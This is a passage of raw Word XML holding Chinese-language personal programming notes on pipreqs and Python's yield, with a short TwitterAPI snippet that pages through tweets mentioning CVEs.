        </w:rPr>
        <w:t>仅将当前项目使用到的类库导出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC03C82" w14:textId="77777777" w:rsidR="008B57C3" w:rsidRDefault="00C71622" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ipreqs: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A963A30" w14:textId="21907409" w:rsidR="00C71622" w:rsidRDefault="00C71622" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C71622">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71622">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip install pipreqs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B43635" w14:textId="77777777" w:rsidR="008B57C3" w:rsidRDefault="00C71622" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requirements</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A197D1A" w14:textId="504D8A01" w:rsidR="00C71622" w:rsidRPr="008B57C3" w:rsidRDefault="00C71622" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B57C3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pipreqs .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF4180" w14:textId="77777777" w:rsidR="008B57C3" w:rsidRDefault="008B57C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决编码报错：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FCBA2" w14:textId="464916DF" w:rsidR="00B8569E" w:rsidRDefault="008B57C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B57C3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pipreqs ./ --encoding=utf8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CF1D1" w14:textId="77777777" w:rsidR="00B8569E" w:rsidRDefault="00B8569E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE56EB5" w14:textId="5BAE6A2E" w:rsidR="00AA0B6C" w:rsidRDefault="004661F9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="_Toc159779878"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>ield</w:t>
      </w:r>
      <w:r w:rsidR="00A31E63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="430"/>
    </w:p>
    <w:p w14:paraId="1BF10890" w14:textId="77777777" w:rsidR="004661F9" w:rsidRDefault="004661F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043C2F4D" w14:textId="7161CEA0" w:rsidR="00FF0FC0" w:rsidRPr="0094644E" w:rsidRDefault="00FF0FC0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094644E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A5A2B" w14:textId="38EBD9CC" w:rsidR="0094644E" w:rsidRDefault="0094644E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00534FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在程序函数中返回某个值，返回之后函数不在继续执行，彻底结束。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA09DF3" w14:textId="104177E3" w:rsidR="00FF0FC0" w:rsidRDefault="0094644E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">yield: </w:t>
      </w:r>
      <w:r w:rsidRPr="00534FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>带有</w:t>
      </w:r>
      <w:r w:rsidRPr="00534FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidRPr="00534FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的函数是一个迭代器，函数返回某个值时，会停留在某个位置，返回函数值后，会在前面停留的位置继续执行</w:t>
      </w:r>
      <w:r w:rsidR="00534FAF" w:rsidRPr="00534FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00534FAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直到程序结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754523F4" w14:textId="77777777" w:rsidR="00A75883" w:rsidRDefault="00A75883" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A5B2B4" w14:textId="5F0AF6CE" w:rsidR="00A75883" w:rsidRDefault="00A75883" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>生成器生成完了数据后，没有再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，就</w:t>
      </w:r>
      <w:r w:rsidR="008B599D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>算是迭代完他了。</w:t>
      </w:r>
      <w:r w:rsidR="00742CC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这个通常可以用来</w:t>
      </w:r>
      <w:r w:rsidR="00440A5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>返回结果后，进行其他“协程”的操作，前面返回数据，后面接着</w:t>
      </w:r>
      <w:r w:rsidR="00440A5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidR="00440A5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，提高效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA6152C" w14:textId="77777777" w:rsidR="00FF0FC0" w:rsidRDefault="00FF0FC0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342B50A5" w14:textId="3C3B5D70" w:rsidR="00FF0FC0" w:rsidRPr="0094644E" w:rsidRDefault="00FF0FC0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094644E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>起因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E22D041" w14:textId="4C2E21E3" w:rsidR="004661F9" w:rsidRDefault="00385A1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始实在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码中调试，遇到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的坑点，调试了很长时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C220E5C" w14:textId="3FF5E9C6" w:rsidR="00A710D0" w:rsidRDefault="00A710D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试的时候，我就在思考，怎么这个函数难道没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，停止运行吗？然后鹏哥过来帮我调试了一下，</w:t>
      </w:r>
      <w:r w:rsidR="00AF3B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>马上就翻到</w:t>
      </w:r>
      <w:r w:rsidR="00AF3B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidR="00AF3B11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我就傻眼了。</w:t>
      </w:r>
      <w:r w:rsidR="00F65FEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序会一直运行，</w:t>
      </w:r>
      <w:r w:rsidR="00F65FEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidR="00F65FEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给出返回值，程序是不停止的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664DE265" w14:textId="77777777" w:rsidR="00A710D0" w:rsidRDefault="00A710D0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064CE8D9" w14:textId="500B894F" w:rsidR="00385A1F" w:rsidRDefault="00D4181E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在重新反省</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用法总结。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD3A5F" w14:textId="77777777" w:rsidR="0044584E" w:rsidRDefault="0044584E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFFF13B" w14:textId="5DB242CF" w:rsidR="00D4181E" w:rsidRDefault="0044584E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码部分：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D74C2" w14:textId="77777777" w:rsidR="002C5769" w:rsidRDefault="002C5769" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># :param count </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是每页返回的推文数量，最大为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TwitterPager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(api, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'search/tweets'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'q'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'cve-'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'count'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>100</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_iterator</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'text' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'text'</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">elif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'message' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">item </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'code'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">] == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>88</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>达到速率限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'SUSPEND, RATE LIMIT EXCEEDED: %s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>% item[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
